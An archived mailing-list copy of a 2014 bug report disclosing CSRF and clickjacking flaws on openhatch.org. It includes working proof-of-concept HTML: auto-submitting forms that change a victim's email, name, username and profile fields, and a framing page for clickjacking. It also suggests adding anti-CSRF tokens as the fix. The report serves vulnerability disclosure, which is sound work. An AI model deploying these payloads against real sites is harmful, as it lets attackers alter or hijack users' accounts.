This site is an archive; learn more about 8 years of OpenHatch.

[OH-Dev] [issue917] CSRF and clickjacking vulnerability at openhatch.org

pik4chu bugs at openhatch.org
Sat Jan 11 16:36:45 UTC 2014 

New submission from pik4chu <jeroldcamacho.res at gmail.com>:

Hey Guys,
I found vulnerabilty at your site, 
Cross-site Request Forgery (CSRF) and Clickjacking vulnerability

Description:
Cross-site request forgery, also known as a one-click attack or session riding
and abbreviated as CSRF or XSRF, is a type of malicious exploit of a website
whereby unauthorized commands are transmitted from a user that the website trusts.

Impact:
The impact of this can be anything from creating new data--which may be an
outright defacement, contain disinformation or direct users to another malicious
website--to deleting or altering existing data.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
<html>
<body onload="javascript:document.forms[0].submit()">
  <body>
    <form action="http://openhatch.org/account/settings/contact-info/do"
method="POST">
      <input type="hidden" name="edit&#95;email&#45;email"
value="jeroldcamacho&#46;res&#64;gmail&#46;com" />
      <input type="submit" value="Submit form" />
    </form>
  </body>
</html>
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
<html>
<body onload="javascript:document.forms[0].submit()">
  <body>
    <form action="http://openhatch.org/account/settings/edit_name_do" method="POST">
      <input type="hidden" name="first&#95;name" value="CSRF" />
      <input type="hidden" name="last&#95;name" value="CSRF" />
      <input type="hidden" name="username" value="CSRF" />
      <input type="submit" value="Submit form" />
    </form>
  </body>
</html>
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
<html>
<body onload="javascript:document.forms[0].submit()">
  <body>
    <form action="http://openhatch.org/people/info/edit/do" method="POST">
      <input type="hidden" name="edit&#45;tags&#45;bio"
value="Cross&#45;site&#32;Request&#32;Forgery" />
      <input type="hidden" name="edit&#45;tags&#45;homepage&#95;url" value="" />
      <input type="hidden" name="edit&#45;tags&#45;irc&#95;nick" value="" />
      <input type="hidden" name="edit&#45;tags&#45;understands" value="" />
      <input type="hidden" name="edit&#45;tags&#45;understands&#95;not" value="" />
      <input type="hidden" name="edit&#45;tags&#45;studying" value="" />
      <input type="hidden" name="edit&#45;tags&#45;can&#95;pitch&#95;in" value="" />
      <input type="hidden" name="edit&#45;tags&#45;can&#95;mentor" value="" />
      <input type="hidden" name="edit&#45;tags&#45;contact&#95;blurb" value="" />
      <input type="submit" value="Submit form" />
    </form>
  </body>
</html>

to fix the csrf.. you must add auth token in every html forms at your site :)


I FOUND CLICKJACKING VULNERABILITY TOO
~~~~~~~~~~~~~~~~~~~~~
<html><style>     iframe { 
width: 800px; 
height: 500px; 
position: absolute; 
top: 0; left: 0; 
filter: alpha(opacity=50); 
opacity: 0.5; 
}  
</style>
<iframe src="http://openhatch.org/"></html>

----------
messages: 4039
milestone: later
nosy: paulproteus, pik4chu
priority: critical
status: testing
title: CSRF and clickjacking vulnerability at openhatch.org

__________________________________________
Roundup issue tracker <bugs at openhatch.org>
<https://openhatch.org/bugs/issue917>
__________________________________________

More information about the Devel mailing list